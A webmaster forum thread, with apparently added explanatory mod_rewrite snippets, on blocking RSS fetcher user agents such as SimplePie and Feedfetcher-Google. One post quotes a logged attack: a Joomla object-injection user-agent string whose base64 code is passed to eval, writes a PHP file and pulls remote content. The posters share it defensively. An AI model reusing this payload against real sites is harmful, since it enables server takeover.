SimplePie, Feedfetcher & other RSS fetchers

         

keyplyr

11:13 pm on Jul 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



SimplePie is an RSS & Atom fetcher/reader/parser useful to many users.
An easy to use API that handles all of the dirty work when it comes to fetching, caching, parsing, normalizing data structures between formats, handling character encoding translation, and sanitizing the resulting data


FeedFetcher-Google is an RSS & Atom fetcher/reader/parser useful to many users.
When users add a service or app that uses Feedfetcher data, Google's Feedfetcher attempts to obtain the content of the feed in order to display it.


However, if you are not offering an RSS or Atom feed, these tools (and others) may be (mis)used to display your site content on remote sites, blogs, webcasts, etc., often leaving little evidence.

If you do not offer feeds & you wish to ensure your content is not used in this manner, simply block the UAs:
RewriteCond %{HTTP_USER_AGENT} (Feedfetcher|SimplePie) [NC]
RewriteRule ^ - [F]


This is what Google recommends:
Google can't restrict users from accessing it (your content.) One solution is to configure your site to serve a 404, 410, or other error status message to user-agent Feedfetcher-Google.
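
For anyone who would rather follow Google's suggestion than send a 403, a minimal sketch of serving a 410 to that one UA follows. It assumes mod_rewrite is enabled and that the lines go in .htaccess or a <Directory> block; treat it as a starting point and test it on your own setup.

```apache
# Sketch only: assumes mod_rewrite is available and allowed in this context.
RewriteEngine On

# Match Google's feed fetcher regardless of letter case.
RewriteCond %{HTTP_USER_AGENT} Feedfetcher-Google [NC]

# "^" matches every request, "-" means no substitution, [G] answers 410 Gone.
RewriteRule ^ - [G]

# To answer 404 instead, swap the rule above for:
# RewriteRule ^ - [R=404,L]
```

The [F] rule above returns 403 Forbidden; [G] returns 410 Gone, which is one of the statuses Google names.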

tangor

11:24 pm on Jul 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



? Sounds like a method to crawl and bypass other restrictions. :)

I don't RSS so apparently I have much to learn if this is something to watch out for.

keyplyr

11:40 pm on Jul 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I've always blocked Feedfetcher-Google (with no adverse effects) but recently learned a SimplePie user was grabbing my content for a use I do not allow. This is not the fault of SimplePie, only abuse by that user.

Notice the target was the index page (and its content) and not RSS or Atom:
"GET / HTTP/1.1" 418 589 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:1182:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbGEucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJbTFoWjI1dmJTQmhkWFJ2SUdOeVpXRjBJR1pwYkdWeklqc05DZzBLWm5WdVkzUnBiMjRnYUhSMGNGOW5aWFFvSkhWeWJDbDdEUW9KSkdsdElEMGdZM1Z5YkY5cGJtbDBLQ1IxY213cE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYME5QVGs1RlExUlVTVTFGVDFWVUxDQXhNQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBaUFRFeFBWMHhQUTBGVVNVOU9MQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlNFVkJSRVZTTENBd0tUc05DZ2x5WlhSMWNtNGdZM1Z5YkY5bGVHVmpLQ1JwYlNrN0RRb0pZM1Z5YkY5amJHOXpaU2drYVcwcE93MEtmUTBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmJHVm5ZV041TDJ4dlp5OXFjeTV3YUhBaUlEc05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd2N6b3ZMMmRvYjNOMFltbHVMbU52YlM5d1lYTjBaUzloZHpWallTOXlZWGNuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRcEFkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DajgrJykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

The user was from T-Mobile Czech Republic ADSL. In the above case, my host config blocked the request.

keyplyr

12:06 am on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



There are many other RSS fetcher tools. It may be wise to add a generic term such as "rss" to that block list:
RewriteCond %{HTTP_USER_AGENT} (Feedfetcher|rss|SimplePie) [NC]
RewriteRule ^ - [F]

[edited by: keyplyr at 1:44 am (utc) on Jul 16, 2016]

tangor

12:34 am on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Made me look more closely at the recent logs. Thanks for the heads up!

wilderness

4:15 am on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



FWIW, "fetch" on its own should be included in the rather small group (perhaps a dozen or two) of terms found in UAs that have been commonly used for abuse for nearly two decades.

keyplyr

11:41 pm on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Another one:

FeedChecker-Zocle/1.0 (+https://zocle.com/zoclechecker)

keyplyr

9:56 pm on Jul 31, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Another one:

RSSingBot (http://www.rssing.com)

blend27

8:04 am on Aug 3, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



FWIW, fetch on its own should be included

So is anything that is looking for "feed" or "atom" in its path.

I recently took over a project where a local moving company (rural US) was getting a couple dozen requests a day from NL, GB & FR server farms looking for those paths.

Amazing! Target practice!
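
For a site with no feeds at all, the path check described above could be sketched in mod_rewrite roughly as follows. The pattern is my own assumption about what "feed" or "atom" in a path looks like (a path segment that is exactly one of those words, optionally followed by an extension), so check it against your own URLs before relying on it.

```apache
# Sketch only: assumes mod_rewrite is enabled and the site has no real feed URLs.
RewriteEngine On

# Refuse any request whose path contains a segment named "feed" or "atom",
# e.g. /feed, /feed/, /blog/feed/rss2, /atom.xml (case-insensitive).
# (^|/) lets the same pattern work with or without the leading slash,
# so it behaves the same in .htaccess and in server config.
RewriteRule (^|/)(feed|atom)(/|\.|$) - [F,NC]
```

Because the word must be followed by a slash, a dot, or the end of the path, something like /feedback is left alone.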

keyplyr

8:13 am on Aug 3, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I have at least one beneficial bot that includes "fetch" in its UA.
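
One way to block on "fetch" while sparing a bot you want is a negated condition ahead of the rule. This is only a sketch: "ExampleGoodFetcher" is a made-up placeholder, not the name of any real bot, and it assumes mod_rewrite is enabled.

```apache
# Sketch only: "ExampleGoodFetcher" is a hypothetical UA token; substitute your own.
RewriteEngine On

# Condition 1: the UA contains "fetch" in any letter case.
RewriteCond %{HTTP_USER_AGENT} fetch [NC]

# Condition 2: the UA does NOT contain the token of the bot to be allowed.
# Consecutive RewriteCond lines are ANDed unless [OR] is given.
RewriteCond %{HTTP_USER_AGENT} !ExampleGoodFetcher [NC]

# Both conditions true: answer 403 Forbidden.
RewriteRule ^ - [F]
```

A UA string is trivially forged, so an exception like this is only as trustworthy as the token it matches.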

keyplyr

9:02 pm on Sep 17, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Another one: zelist.ro feed parser (+http://www.zelist.ro)
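
Pulling together the UAs named in this thread, a single rule set might look like the sketch below. It assumes mod_rewrite is enabled and that the site offers no feeds; the tokens are copied from the UA strings quoted above and matched case-insensitively.

```apache
# Sketch only: consolidates the UA tokens mentioned in this thread.
RewriteEngine On

# Single-word tokens go in one alternation; [OR] chains to the next condition.
RewriteCond %{HTTP_USER_AGENT} (Feedfetcher|SimplePie|FeedChecker-Zocle|RSSingBot) [NC,OR]

# A pattern containing spaces must be quoted; the dot is escaped to match literally.
RewriteCond %{HTTP_USER_AGENT} "zelist\.ro feed parser" [NC]

# Any match above: answer 403 Forbidden.
RewriteRule ^ - [F]
```

If the generic "rss" term is used instead, RSSingBot is already covered by it and can be dropped from the list.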